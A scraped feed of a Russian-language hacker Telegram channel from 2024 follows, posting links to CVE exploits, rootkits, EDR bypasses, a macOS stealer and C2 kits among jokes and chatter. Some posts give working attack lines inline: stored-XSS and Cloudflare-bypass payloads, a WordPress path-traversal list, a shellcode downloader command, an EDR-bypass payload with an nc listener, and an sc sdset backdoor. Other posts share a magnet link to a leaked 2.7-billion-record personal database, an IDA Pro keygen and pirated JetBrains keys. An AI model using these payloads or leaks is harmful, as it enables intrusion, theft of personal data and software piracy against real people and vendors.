2024-12-20 19:00:56 |
Черт, это действительно смешная пятничная история)))*GRUB LUKS Bypass and Dump |
Images
|
2024-12-20 15:25:34 |
В сеть слили ранее не изданную альтернативную концовку фильма Хакеры 1995 года#friday |
|
2024-12-20 07:53:52 |
CVE-2024-56145: Craft CMS*RCE без аутентификацииНО, только если включен параметр конфигурации PHP `register_argc_argv`*Exploit Command:python exploit.py exploit -u <TARGET_URL> -lh <LOCAL_HOST> -lp <LOCAL_PORT> -px <PAYLOAD_TYPE>*EXploit |
Images
|
2024-12-20 07:20:07 |
CVE-2024-49194 *Databricks JDBC Attack via JAAS *WriteUP + POC |
Images
|
2024-12-20 05:21:28 |
Отличное |
Images
|
2024-12-19 22:05:19 |
JA4H (на witehatовском)*Dissecting JA4H for improved Sliver C2 detections |
Images
|
2024-12-19 11:45:11 |
CVE-2024-10793 *Плагин WP Activity Log для WordPressХранимая XSS через параметр user_id во всех версиях до 5.2.1curl -X POST 'http://example.com/wp-admin/admin-ajax.php' \ -d 'action=destroy-sessions&user_id=<script>alert("XSS found 1")</script>' |
|
2024-12-19 11:37:15 |
CVE-2024-53376 *CyberPanel ( versions < 2.3.8 ) Authenticated OS Command Injection*WriteUP*exploit |
Images
|
2024-12-19 11:32:41 |
CVE-2024-53375 *TP-Link Archer AXE75 Authenticated Command Injection*Exploit |
Images
|
2024-12-19 06:45:00 |
CVE-2024-50379 Apache Tomcat*Проблема с состоянием гонки времени проверки времени использования (TOCTOU), которое может привести к удаленному выполнению кода (RCE), особенно в файловых системах, нечувствительных к регистру, таких как Windows.*Exploitation and POC |
|
2024-12-18 23:06:40 |
На завтра уже, споть*90-Day Cybersecurity Plan*Cloud Security Labs*linux-attack-forensics-purple labs |
Images
|
2024-12-18 16:06:42 |
Крутой разбор !!!*OtterRoot: Netfilter Universal Root 1-day |
Images
|
2024-12-18 10:21:37 |
Svartalfheim*Шелкодесы))Stage 0 Shellcode to Download a Remote Payload and Execute it in Memory*LinkUsage python3 builder.py -u 10.10.100.121 -u /path/to/shellcode.bin -p 80 python3 builder.py -u 10.10.100.121 -u /path/to/shellcode.bin -p 443 -s |
|
2024-12-18 09:57:05 |
Apache Struts2 CVE-2024-53677*POC+WriteUp |
Images
|
2024-12-18 09:24:43 |
CVE-2024-1086 Linux LPE*Exploit |
Images
|
2024-12-14 14:44:40 |
CVE-2024-38819*Spring Boot 3.3.4, based on Spring Framework 6.1.13 path traversal exploit*POC + docker |
|
2024-12-14 12:55:31 |
Праздник к нам приходит !!!*Официальное лицо нового года\деда мороза\ёлки и фейерверка в уходящем 2024 - Яша добрый хакер.Большое спасибо за посылку !!! Книги огонь, круто !Жду тебя в сервеной столице 😎👌😁#friends #books #Xmas |
Images
Images
|
2024-12-13 20:08:45 |
OpenBAS — это платформа с открытым исходным кодом, позволяющая организациям и проводить кампании и тесты по моделированию киберпреступлений.*Link |
Images
|
2024-12-13 13:25:01 |
PendingFileRenameOperations + Junctions EDR Disable*PendingFileRenameOperations позволяет приложениям создавать операции переименования файлов, создавая запись реестра в HKLM\\SYSTEM\\CurrentControlSet\\Control\\Session Manager. *Link#win #edr |
Images
|
2024-12-13 13:19:08 |
MyQ Print Server Unauthenticated RCE (CVE-2024-28059)*😆 |
Images
|
2024-12-13 11:01:52 |
Collection of Linux Rootkit codes *Link |
Images
|
2024-12-10 20:01:19 |
да быть не может, все же ок ))) |
|
2024-12-09 19:48:38 |
Мяу |
|
2024-12-09 19:48:32 |
None |
Images
|
2024-12-08 10:04:06 |
Freeman/Freecat 😀 |
|
2024-12-07 21:45:30 |
CVE-2024-38144 *LPE vulnerability in Windows 11 due to Integer Overflow in ksthunk.sys*Перспективненько*WriteUp + exploitWriteUp + exploit 2 |
Images
|
2024-12-07 05:30:04 |
CVE-2024-41713*Mitel MiCollab Authentication Bypass to Arbitrary File Read*Exploit |
Images
|
2024-12-06 13:37:53 |
Группа Nanowar of Steel создала гимн Java, текст которого полностью состоит из кода*github.com/NanowarOfSteel/HelloWorld#metall #friday #party |
|
2024-12-06 08:20:46 |
exit VIM (done) |
Images
|
2024-12-05 20:37:22 |
BootExecute EDR Bypass*Грузи малварь от ntdll.dll — до полной загрузки операционной системы Windows.Метод и правда старый и много где используется, всегда логика была в том что бы стартануть раньше AV\EDR и даже килять его (хуки там всякие и тд).*D0wnL0@d |
Images
|
2024-12-05 09:03:10 |
CVE-2024-51378 CyberPanel Command Injection*WriteUp*exploit |
Images
|
2024-12-05 08:51:49 |
CVE-2024-11680 ProjectSend r1605*Exploit |
Images
|
2024-12-04 20:34:42 |
Рубрика .git leaks*Чуваки за 30 дней вытащили 1439 действительных токенов гитЛАБа и гитХАБа.Токены обеспечивают доступ к:108 707 репозиториям кода.2117 организациям/группам.*Список юзеров у которых увели токен с GitHubСписок юзеров у которых увели токен с GitLab*Ищем себя ))Ну стоит добавить что это whitehat команда, и если себя нашли просят связаться с Gi7w0rm , добряки ))) |
Images
|
2024-12-04 16:01:30 |
Channel photo updated |
|
2024-12-04 08:27:28 |
CVE-2024-42327 / ZBX-25623*zabbix SQLi*POC |
Images
|
2024-12-03 17:33:20 |
Kernel (Linux) _#*В ядре Linux в системных вызовах exec существует проблема времени проверки/времени использования. Разрешения на выполнение проверяются в другое время, чем применяется бит set-user-ID. Это LPE.Есть два состояния бинаря (условно), которые должны быть безопасными:1. Бинарь имеет root-идентификатор + set-user-ID, но хакеру его не исполнить.2. Бинарь не имеет руть идентификатора, потому может быть выполнен хакером.*А вот тут то и впрягается состояния гонки, как и в реальном мире, старичок бит может не успеть выпить таблетки*Proof of Concept#LPE #linux #ricecondition #kernel |
|
2024-12-02 14:26:32 |
AWSUnauthorized Access to Metadata and User Data*Link |
Images
|
2024-12-02 02:18:33 |
CVE-2024-44308 Apple (Safari)*RCE *WriteUp + POC * |
Images
|
2024-12-02 02:10:02 |
fucking mondaysudo wget cofee_and_cat.shchmod +x cofee_and_cat.sh./cofee_and_cat.sh |
Images
|
2024-12-02 02:04:20 |
CVE-2024-11320 Pandora FMS*RCE exploit |
Images
|
2024-12-01 21:19:25 |
Linux Malware Development:Создание reverse shell на основе TLS/SSL на Python*writeUP*source: reverse_ssl.py |
Images
|
2024-12-01 03:45:23 |
Exploit-Street Улица Сезам* LPE exploits для Windows (2023\2024)*Link |
Images
Images
|
2024-11-30 20:08:50 |
CVE-2024-44285 * panic iOS 18.0/18.0.1*POC |
Images
|
2024-11-30 16:09:43 |
bypass EDR*payloadhttps://&cmd/c\\\\192.168.2.15\\Public\\aa.batnc -lvnp 4444 + еще decimal можно |
|
2024-11-30 06:57:26 |
XSS в 2024и смешно и грустно |
|
2024-11-29 08:32:51 |
HellPot — это кроссплатформенный портал бесконечных страданий, предназначенный для наказания неуправляемых HTTP-ботов. 😁😄Описание ТОП )Link |
Images
|
2024-11-25 09:32:01 |
None |
Images
|
2024-11-25 06:40:24 |
Хуй с ним, пойду |
|
2024-11-25 06:39:49 |
Такое |
|
2024-11-25 06:39:40 |
None |
Images
|
2024-11-25 06:39:12 |
Болит пиздец |
|
2024-11-25 06:38:44 |
None |
Images
|
2024-11-25 06:38:27 |
Болит |
|
2024-11-25 06:38:21 |
Блять руку |
|
2024-11-25 06:37:42 |
Возьму |
|
2024-11-25 06:37:29 |
Щас |
|
2024-11-24 18:38:48 |
MacOS Stealer*source code |
Images
|
2024-11-23 08:02:24 |
XOR Encrypted Shellcode Execution via Desktop Enumeration*Link |
Images
|
2024-11-16 21:01:07 |
С днем рождения !!!!Сегодня Proxy Bar исполняется 3 года ***Много воды утекло, но вектор канала сохранился, изменения коснулись чата группы, а именно:# был перестроен чат# набралась команда админов (хорошие специалисты и прекрасные люди)# В рамках чата начали формироваться конкурсы и авторские статьи (+ source code)*Ну и по поводу дня рождения хотим поделиться в Вами некоторыми нашими сервисами:заходите на proxy-bar.org там есть краткое описание, из основногоэто секция Soft, Send, Secnote, PrivateBin, Jabber (много кто просил) и библиотека *С праздником, и Вас и Нас ! 😜*Если Вам нравится то что мы делаем, Вы можете нас поддержать:***Donate:Bitcoin bc1qmrt229eghjyj9wqa7nmr9j8zuq6khz6km2pker#lденьрождения #админы #всевсевсе |
|
2024-11-15 18:54:19 |
CVE-2024-47575 FortiManager*Удивительно быстро ушел push, да еще и заапрувили в metasploit-frameworkНо так или иначе модуль есть, жми msfupdate ))*Pull Req#fortinet #metasploit |
Images
|
2024-11-15 12:52:44 |
Шифруем payload с помощью алгоритма DFC (Decorrelated Fast Cipher)*WriteUP SourceCode Demo |
Images
|
2024-11-15 05:14:23 |
С пятницей !Тут недавно кикнули канал клуба 1337 Мы уж не будем вдаваться в подробности кто и за чем и при чем тут закрытый чат канала, а просто скажем что состоялся ReBorn и это хорошо.Поэтому заходите:Телега: club31337Твиттер (X): club31337 |
Images
|
2024-11-14 09:11:37 |
Zero-Day CVE-2024-43451 One click*Прикольно конечно, идешь так по URL на сайт правительства (lol 1) Украины (lol 2) для получения академических сертификатов, клац правой кнопочкой и получаешь модный URL на 0Day.А кто ходит на сайт правительства Украины за сертификатами ? Правильно - украинские организации. Ну дальше все понятно.В зайце — утка, в утке — яйцо, в яйце игла — смертьZIP, а в нем PDF, диплом и URL, где URL дергает сплоит и уводит на C&C кого надо.А надо видимо господам из UAC-0194 )))) |
Images
|
2024-11-12 20:52:34 |
Citrix Virtual Apps and Desktops (XEN)* Unauthenticated Remote Code execution*exploit |
|
2024-11-12 03:58:52 |
CVE-2024-50340 - Adapted EOS Exploit*CVE-2024-4985 / CVE-2024-9487 - GitHub Enterprise SAML Authentication Bypass exploit |
Images
|
2024-11-12 03:21:36 |
С днем рождения DAMAGELAB / XSS20 лет как никак 😎 |
Images
|
2024-11-11 15:50:20 |
From Tito to Stalin*An In-Memory Rootkit For Linux*Tito |
Images
|
2024-11-11 12:05:22 |
SQLMap Command Generator |
Images
|
2024-11-10 15:27:59 |
Telegram-Android*Partisan-style. source |
Images
|
2024-11-10 01:37:34 |
sshd CTF*Крутая CTF с нашумевшим XZ Utils backdoor.Все в наличии: liblzma, шеллкодесы, encrypt/decrypt и вот это вот все.*ТЫЦ#ctf |
Images
|
2024-11-04 22:44:10 |
с прадздником |
|
2024-11-04 22:43:58 |
ну с где ГРУмало кто читает, и сегодня 40 лет назад мы штурманули один замок, меч взяли и уронили НФЕФТЬ |
|
2024-11-02 03:54:07 |
Ну что, мыловары, с праздником ! 😎#2nov1988 |
Images
|
2024-11-01 04:08:01 |
CVE-2024-39205*Pyload (работающий под управлением Python3.11 или ниже) уязвим к RCE*Exploit |
Images
|
2024-10-31 19:13:19 |
Вот это круто я считаю !*RAM симуляторРеализовано show_memory_stats - а значит мы будем знать какие фреймы заняты, а значит можно тестить всякую защиту и\или малварь, всякие атаки типа RowhammerКстати статья по теме: Exploiting the DRAM rowhammer bug to gain kernel privileges#Wow |
Images
|
2024-10-31 11:46:31 |
LooooLФэйк сразу и на Ачат и на XSS. |
Images
|
2024-10-31 08:25:10 |
Быстрый поиск RDP по аутлуку*Распространенная практика рассылать креды\ssh\rdp\etc в рамках корпоративной почты*\\Content\.Outlook\\[A-Z0-9]{8}\\[^\\]{1,255}\.rdp$или \AppData\Local\Microsoft\Windows\\Content.Outlook\.rdp |
Images
|
2024-10-30 15:44:05 |
Windows 11 23H2 LPE*Уязвимость в драйвере Common Log File System (CLFS) *WriteUp и Сплоит |
Images
|
2024-10-30 07:45:27 |
CyberPanel 2.3.6 pre-auth RCE *writeUP*POC exploit |
Images
|
2024-10-30 07:38:21 |
Xlight SFTP server <= 3.9.4.2*POC exploit |
|
2024-10-27 23:32:29 |
bbyPASS windows |
|
2024-10-26 20:41:05 |
уж как есть |
|
2024-10-26 20:40:58 |
но |
|
2024-10-26 20:40:55 |
оба плохие |
|
2024-10-26 20:40:35 |
есть 2 варианта |
|
2024-10-26 20:39:37 |
надо думать |
|
2024-10-26 20:39:25 |
я серьезно |
|
2024-10-26 20:38:23 |
нельзя днрэать это все в одглно |
|
2024-10-26 20:37:44 |
то |
|
2024-10-26 20:37:37 |
грпппу и всю этц хуйнцю |
|
2024-10-26 20:37:15 |
если я аидат |
|
2024-10-26 20:36:55 |
илья |
|
2024-10-26 20:36:39 |
@e |
|
2024-10-25 12:12:23 |
Падонки, изменники, вероотступники !VIM для вас какая то шутка что ли ?Свят Свят и присвятой !q |
Images
Images
|
2024-10-23 15:43:56 |
CVE-2024-46538*PfSense Stored XSS lead to RCE*POC exploit |
|
2024-10-22 07:55:52 |
Доброго утра.*напоминаем, что у нас стартовал небольшой конкурс*Если у Вас есть идеи - добро пожаловать 👌 |
|
2024-10-21 04:13:52 |
Microsoft Windows Flaw: CVE-2024-30090*read wtf*POC exploit#win #lpe |
|
2024-10-20 20:25:32 |
Новое о старом. LD_PRELOAD в наличии*bedevil: Dynamic Linker Patching#rootkits |
Images
|
2024-10-20 15:42:57 |
CVE-2024-9264 Grafana*exploit |
|
2024-10-17 21:54:48 |
поесть |
|
2024-10-17 21:54:45 |
сходить |
|
2024-10-17 21:54:40 |
надо |
|
2024-10-17 17:21:35 |
свято |
|
2024-10-17 00:34:22 |
разделите 2 на 3 ))))))))))))))))))))) |
|
2024-10-16 17:11:58 |
чисто на на продажу2 сплоита на ВЕБ и на я дро |
|
2024-10-14 11:28:48 |
vmw-logger-rs*Использует недокументированный встроенный бэкдор для взаимодействия гостевого хоста с поддержкой no_std.*Link |
|
2024-10-13 20:47:36 |
CVE-2024-9464*уязвимость внедрения неаутентифицированных команд*Exploit |
Images
|
2024-10-13 17:50:14 |
The Sweet16 – the oldbin lolbin called setup16.exe*Этот вот setup16.exe со времен кайнозоя, в ХП уж точно был, ну как говорится old dog, new tricks*Link |
|
2024-10-13 13:13:22 |
Chaos-Rootkit*widows x64 Ring 0 rootkit*возможности скрытия процессов, повышения привилегий, защиты и снятия защиты процессов, а также ограничения доступа к файлам, за исключением процессов из белого списка. *link#win #rootkit |
Images
|
2024-10-13 13:09:03 |
CVE-2024-42640*Unauthenticated Remote Code Execution via Angular-Base64-Upload Library *exploit |
|
2024-10-07 05:19:32 |
видимо нужно куда иддти позавтравкать |
|
2024-10-06 20:40:33 |
su/sudo/root)))) |
Images
|
2024-10-05 10:23:03 |
WoW !!!!https://protocell.xyz/Примерно так видится киберпанк ГибсонаДвигайте кирпичи в центре до 100%#cyberpunk #awesome |
Images
|
2024-10-05 06:36:28 |
CVE-2024-45409*GitLab - SAML Authentication Bypass*Патч уже есть, но все же.Процесс ворования cookie + nuclei template*id: CVE-2024-45409nuclei template |
|
2024-10-05 06:13:11 |
Мы уже публиковали по поводу CVE-2024-45519 - Zimbra*Но, вот отличный Postjournal Exploit + руководство как настроить стенд что бы поиграться со сплоитом и далее повышать привилегии (либо в бок уходить)*zimbra.labo |
Images
|
2024-10-05 05:52:47 |
Завтракаем |
|
2024-10-04 20:35:44 |
CVE-2024-26304 RCE-exploit*HPE Aruba Device*usage:python3 CVE-2024-26304.py -u http://127.0.0.1 |
|
2024-10-04 11:46:53 |
TeamViewer *From User to Kernel Elevation of Privilege*CVE-2024-7479 и CVE-2024-7481*POC exploit, детали, видео#кайзерСозэ |
Images
|
2024-10-04 04:54:28 |
UBUNTUводы тут ? *в PAM модуле дырка, в su, sudo и ssh (значит сетевой вектор присутствует)* PAM module may allow accessing with the credentials of another user#ubuntu #PAM |
|
2024-10-03 17:57:25 |
suqo ))))) |
Images
|
2024-10-02 19:49:52 |
CVE-2024-29050 Windows Cryptographic Services RCE*X509_ASN_ENCODINGPKCS_7_ASN_ENCODINGи вот это вот все*Статья + POC exploit |
Images
|
2024-10-02 17:15:26 |
DOCKER# Privilege Escalation*From normal to R00T user using this simple technique !#dicker |
Images
|
2024-10-02 16:33:02 |
CVE-2024-38200 Microsoft Office NTLMv2 *exploit |
|
2024-10-02 15:50:02 |
CVE-2024-38816 Spring Framework*exploit |
|
2024-10-02 05:31:18 |
CVE-2024-36435*RCE Flaw in Supermicro BMC IPMI Firmware*WriteUp*POC exploit#servers #ipmi #rce |
|
2024-10-01 19:59:07 |
CLOUDFLARE BYPASS<Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmbGFyZSBCeXBhc3NlZCA6KQ=="))> |
Images
|
2024-10-01 05:29:01 |
Ретро из 2000 года !*Можно заDOSить Win95, Win98, Win98sr2, WinNT4*Link#cool #blablaAbout |
Images
|
2024-09-30 07:23:34 |
CVE-2024-26808 *Local Privilege Escalation Risk in Linux*WriteUp*Exploit#linux #lpe |
Images
|
2024-09-29 22:24:03 |
LOLESXi *Living Off The Land ESXi |
Images
|
2024-09-29 09:35:40 |
CVE-2024-45519 *SMTP exploit |
|
2024-09-26 17:23:42 |
Пипец |
|
2024-09-22 06:53:01 |
Пойду додожгу |
Images
|
2024-09-22 06:50:41 |
@ |
|
2024-09-22 05:41:17 |
пойду кусок пиццу съем на завтрак |
|
2024-09-20 16:35:13 |
API routes fuzzing*WordlistsЮр лицо представили ? #*_0 |
Images
Images
|
2024-09-19 15:05:03 |
Скрытие (и раскрытие) процессов Linux**1. Hiding Linux Processes with Bind Mounts*2. The 'Invisibility Cloak' - Slash-Proc Magic#linux #hacks |
Images
|
2024-09-19 05:17:54 |
Хакер хакера поневоле брат *Уязвимости в популярных\opensource СС\С2 фреймворках* |
Images
|
2024-09-18 13:47:08 |
Побег из KVM*writeUP - trojan-turtles*exploit |
Images
|
2024-09-17 19:33:56 |
Умели раньше в сплоиты !*CVE-1999-1587 - Solaris 8, 9* |
Images
|
2024-09-17 19:12:27 |
CVE-2024-23692 RCE*Rejetto HTTP File Server*exploit |
Images
|
2024-09-17 05:24:47 |
CVE-2024-38080 Hyper-V 1-Day*WriteUp*POC exploit#hyper-v |
Images
|
2024-09-16 17:35:14 |
А Вы читали библию сегодня ? *Malcore Malware Bible#malware |
Images
|
2024-09-16 13:12:52 |
CVE-2024-40711 Exploit Veeam backup and Replication*WriteUp*Pre-Auth exploit#veeam #rce |
|
2024-09-15 06:43:42 |
CVE-2024-8504 и CVE-2024-8503*SQLi and RCE - VICIdial*Exploit |
Images
|
2024-09-14 19:58:26 |
BEAR-C2*Мишка - это компиляция скриптов C2, полезных данных и стейджеров, используемых в симулированных (?) атаках российскими группами APT.DownLoad#мишка #C2 |
Images
|
2024-09-13 15:48:09 |
LoL )))reCAPTCHA Phish |
|
2024-09-09 09:59:42 |
Легальный и малозаметный LPE backdoor в WiNd0z*Разрешаем удаленное использование Services.mscsc sdset SCMANAGER D:(A;;CCLCRPRC;;;AU)(A;;CCLCRPWPRC;;;SY)(A;;KA;;;BA)S:(AU;FA;KA;;;WD)(AU;OIIOFA;GA;;;WD)sc.exe sdset scmanager D:(A;;KA;;;WD)#win #backdoor |
Images
|
2024-09-06 10:26:17 |
Хакерский митап SPbCTF × Яндекс*Где: в питерском офисе Яндекса БЦ БенуаКогда: 21 и 22 сентября*Расписание и доклады: глянуть тут*Что бы прийти ногами или получить линк на онлайн трансляцию - пройти регистрацию ТУТ#spb #yandex #ctf #hacks #party |
Images
|
2024-09-05 18:56:44 |
None |
Images
|
2024-09-05 13:35:57 |
CVE-2024-20017 Zero-Click Exploit Wi-Fi Chipsets*CVSS 9.8*Отличный разбор:4 exploits, 1 bug: exploiting cve-2024-20017 4 different ways*Сам Exploit |
Images
|
2024-09-05 11:28:55 |
CVE-2024-24401 NAGIOS *Authenticated SQL Injection*POC exploit |
Images
|
2024-09-02 08:47:15 |
SUDO_KILLER*Скрипт под:Сбор учетных данныхНеправильные конфигурацииОпасные двоичные файлы (GTFOBINS)Уязвимые версии sudo — CVEУязвимость Sudo и неправильная конфигурация, связанные с 3dPartyОпасные переменные окружающей средыДоступные для записи каталоги, в которых есть скриптыДвоичные файлы, которые можно заменить/переместить*Download + много демо + докер для тестов#sudo |
|
2024-08-31 16:02:42 |
Прекрасное в мире плагинов WordPress*simple-image-manipulator/wp-content/plugins/./simple-image-manipulator/controller/download.php?filepath=/etc/passwdactivehelper-livehelp/wp-content/plugins/activehelper-livehelp/server/offline.php?MESSAGE=MESSAGE%3C%2Ftextarea%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&DOMAINID=DOMAINID&COMPLETE=COMPLETE&TITLE=TITLE&URL=URL&COMPANY=COMPANY&SERVER=SERVER&PHONE=PHONE&SECURITY=SECURITY&BCC=BCC&EMAIL=EMAIL%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&NAME=NAME%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&amministrazione-aperta/wp-content/plugins/amministrazione-aperta/wpgov/dispatcher.php?open=../../../../../../../../../../etc/passwdanti-plagiarism/wp-content/plugins/anti-plagiarism/js.php?m=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ebuddypress-component-stats/wp-content/plugins/buddypress-component-stats/lib/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwddzs-videogallery/wp-content/plugins/dzs-videogallery/admin/upload.phpe-search/wp-content/plugins/e-search/tmpl/title_az.php?title_az=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Efancy-product-designer/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.phphd-webplayer/wp-content/plugins/hd-webplayer/playlist.phplocalize-my-post/wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd |
|
2024-08-30 18:28:13 |
CVE-2024-6670 WhatsUp Gold*Статья Exploiting Pre-Auth SQL Injection in WhatsUp Gold*POC exploit |
Images
|
2024-08-30 10:03:21 |
CVE-2024-43044 Jenkins *WriteUP*POC exploit#jenkins |
|
2024-08-29 12:05:56 |
wow*c/asm |
|
2024-08-29 10:17:32 |
CVE-2024-5932 *WordPress GiveWP POP to RCE*POC exploit |
Images
|
2024-08-28 11:31:39 |
Лохматый научился включать свою любимую тапалку с мышками на айпадеСкоро рутанет |
|
2024-08-28 09:50:02 |
CVE-2024-38063 (RCE in tcpip.sys) *POC exploit |
|
2024-08-26 10:34:34 |
Nuclei templates*6000 штук |
|
2024-08-25 07:55:52 |
#FreePavel |
Images
|
2024-08-24 09:29:19 |
CVE-2024-28000*WordPress, дырка в плагине LiteSpeed Cache (слабая проверка хэша)LPE без аутентификации во всех версиях плагина WordPress до 6.3.0.1*POC exploit |
Images
|
2024-08-23 16:45:36 |
ShellGen*Павашэлл скрипт для генерации ShellCode в различных форматах.Форматы: Raw, ps1, Hex, C, vba, csharpАрхитектура: x64, x86*DownLoad |
Images
|
2024-08-23 08:25:46 |
Реверс-инжиниринг и эксплуатация терминалов бесконтактной оплаты*Слайды тутВидео тут |
Images
Images
|
2024-08-21 14:14:03 |
None |
|
2024-08-20 14:45:05 |
NationalPublicData - BD *2,7 млрд записей информацией на жителей США*National Public Data — шарага, которая собирает жирные объемы приватной инфы, а потом продает, как в медиа так и по запросу. Там и проверка записей из криминальной базы сШа и составление биографических отчетов.*Пасс на архив https://usdod.io/ если тянуть с https://usdod.io/UPDATE magnet:?xt=urn:btih:3caa71f3ec8cbccc6fca4feb7185da2bab149ba7&dn=NPD&tr=udp%3A%2F%2Ftracker.opentrackr.org%3A1337%2Fannounce#bd |
Images
|
2024-08-20 05:14:02 |
CVE-2024-7928 FastAdmin*Обход каталога и попытка вытащить креды БДДо версии 1.3.3.20220121*POC |
Images
|
2024-08-20 04:59:54 |
Phrack*read stuff |
Images
|
2024-08-19 19:44:38 |
Полезный однострочник для рекурсивного фаззинга-dirsearch -l urls.txt -econf,config,bak,backup,swp,old,db,sql,asp,aspx,aspx~,asp~,py,py~,rb,rb~,php,php~,bak,bkp,cache,cgi,conf,csv,html,inc,jar,js,json,jsp,jsp~,lock,log,rar,old,sql,sql.gz,sql.zip,sql.tar.gz,sql~,swp,swp~,tar,tar.bz2,tar.gz,txt,wadl,zip,log,xml,js,json --deep-recursive --force-recursive --exclude-sizes=0B --random-agent --full-url -o output.txt#saveIt |
|
2024-08-18 19:55:19 |
CVE-2022-24834 Redis*Затронуто:7.0.0 ≤ version < 7.0.126.2.0 ≤ version < 6.2.132.6.0 ≤ version < 6.0.20*Большой разбор + PoC exploit RCE*VideoPOC#redis #rce |
Images
|
2024-08-18 18:27:40 |
Я так понимаю, если план А не сработает, следующий Pwn2Own будет в Медельине 😎#humor #pwn |
|
2024-08-18 09:20:04 |
Навечно в AD*Часть 1Часть 2Часть 3#activedirectory #persist |
Images
|
2024-08-18 05:46:44 |
Свято место ipV6 пусто не бывает*Громкие дыры, такие как CVE-2024-38063 рожают фэйковые сплоиты.*Про песочницы говорить нужно ? А еще мне нравится слово DEMO и главное форков сделали, даже issue открыли, кто баг репорт написал на троян )) 😂#TCPмоёIp |
Images
Images
Images
|
2024-08-17 15:07:23 |
Выбирай кого поздравлять, юзернейм !Wazawaka 32Robert De Niro 81(все фото заряжены на ransomePAtry) |
Images
Images
|
2024-08-16 05:20:37 |
BYOB (Build Your Own Botnet) Unauthenticated RCE*writeup + video*Exploit |
Images
|
2024-08-15 15:24:02 |
Напоминаем по ЦЦ24 и 25 августа 2024 года в Санкт-Петербурге снова состоится компьютерный фестиваль Chaos Constructions.*Вход на фестиваль - свободный и бесплатный (с выходом сложнее)*Расписание на 2 дня тут*Запись на турнир по DOOM II: Hell on Earth:рега в 15:00, а сам турнир в 16:00*Копирование материалов - приветствуется!#CC #ЦЦ |
Images
|
2024-08-13 19:51:22 |
Материалы Defcon и Black Hat 2024*defconBlackHat |
Images
|
2024-08-13 05:43:36 |
Exploiting Hidden Semantic Ambiguity in Apache HTTP Server!*Или почему индеец пахнет гавной*Занятный writeup в котором:3 types of Confusion Attacks 9 new vulnerabilities20 exploitation techniques*BlackHat 2024 PDFLink#apache |
Images
|
2024-08-13 05:17:23 |
Платформа Logsign Unified SecOps*CVE: CVE-2024-5716 to CVE-2024-5722 и CVE-2024-5716 CVE-2024-5717*RCE + ByPass (+ шаблоны nuclei)*POC exploits |
Images
|
2024-08-10 09:07:37 |
IDA PRO генератор лицензий*Все платформы*1. редактируем владельца лицензии, можно на ololo.ru регнуть2. поместить ida/ida64 dll/so/dylib в тот же каталог, что и скрипт.3. запускаем скрипт для генерации лицензии4. копируем сгенерированную лицензию и заменяем dll на пропатченные5 profit*Link на скрипт если удалят то Link на скрипт_2#ida #hex |
Images
|
2024-08-09 19:00:44 |
Поднимем ставки !*ArchLinux SpeedRun PS про Gentoo тоже есть ))😁 |
|
2024-08-09 18:44:13 |
Олимпийские игры в Париже ? Отстой ! 🤮Мы за SpeedRun по активации windows ! 👍 |
|
2024-08-09 05:41:06 |
CVE-2024-21683 0-click RCE*Затронуты версии от Win server 2000 до Win server 2025*Дырка в службе лицензирования удаленных рабочих столов Windows (RDL), в инет сейчас торчит 170 000 таких хостов *Пропатчено в июле*Exploit (репозитории банят, но мы скачали)))#rce #winsrv |
Images
|
2024-08-08 12:09:26 |
None |
Images
|
2024-08-08 12:09:25 |
None |
|
2024-08-08 12:09:12 |
Ultimate Hardware Hacking Gear Guide*PDF 170 страниц#hrdwr |
|
2024-08-08 11:29:21 |
Bug Bounty hunting КУРС*download |
Images
|
2024-08-07 19:28:45 |
GhostWrite уязвимость CPU*Ну если совсем коротко то: атака нарушает все что можно, песочница/контейнер/виртуальные машины.GhostWrite записывает и читает произвольную физическую память на затронутых ЦП RISC-V*ЗаБилдить:gcc -march="rv64gvzve64x" ghostwrite.c -o ghostwrite*POC exploit*WriteUp wtf#kernel #cpu |
|
2024-08-07 12:59:55 |
#lain |
Images
|
2024-08-07 05:33:25 |
CVE-2024-6782 *Caliber 6.9.0 ~ 7.14.0 remote code execution*exploit |
|
2024-08-06 14:33:02 |
Apache OfBiz vulns *Полный набор: POCов, RCEёв, CURLов, Burpсьютов(CVE-2024-32113 CVE-2024-36104 CVE-2024-38856)*// lInK*/#apache |
Images
|
2024-08-05 20:44:20 |
бггsystemctl --revert-mylast-fuckup#MUhumor |
Images
|
2024-08-05 15:13:26 |
SmartScreen - четыре новых метода по демонтажу*writeUP*repo |
|
2024-08-05 05:22:01 |
Атака на EDR*Часть 1Часть 2Часть 3#edr |
Images
|
2024-08-04 16:40:53 |
Linux для пращуров и внуков и пенсионеров*OSEDUCONF - 2022 год*глянуть#real_bad_ass |
Images
|
2024-08-03 19:01:18 |
SLUBStick - атака на кэш ядра linux*Суть атаки сводится к перекрестному кэшированию ядра, перетекает из limited heap в возможность произвольного чтения и записи в памяти (а это LPE и escape docker).Затестили на: ядра 5.9 и 6.2 _ x32/x64Но то ладно, интересно другое, использовались 9 CVE -)Но то ладно, защита ядер SMEP/SMAP/KASLR - в упор не видят атаки -)*В конце августа, будет конфа, где обещают всем участникам в гостиничном номере на подушку положат не шоколадку, а POC exploit*За то зарелизили сочный хрустящий PDF с жирным тех анализом и возможностью применения*Жирный хрустящий slubstick.pdf#linux #vuln |
Images
|
2024-08-03 16:32:03 |
А вы читали когда либо спецификации на C&C ? 👍*Документ серьезный, даже RFC присутствует*Open Source C&C Specification |
|
2024-08-03 06:31:36 |
shadow-rs*Windows Kernel Rootkit*Лангуаге: RUST*link #rootkit #windows #rust |
Images
|
2024-08-03 05:58:51 |
#history #humor |
Images
|
2024-08-02 15:10:52 |
Windows AppLocker Driver (appid.sys) *LPE*exploit#windows #lpe |
|
2024-08-02 09:44:32 |
JetBrains Keys*Ключи истекают 14 сентября 2026 г.*ВСЕ ПРОДУКТЫ !!!*Link |
Images
|
2024-08-01 19:08:17 |
CVE-2024-36401 GeoServer*POC мы уже публиковали, но тут прям fullH0use*Полный exploit + модуль для Mass Scanning*Download exploit |
Images
|
2024-08-01 08:33:13 |
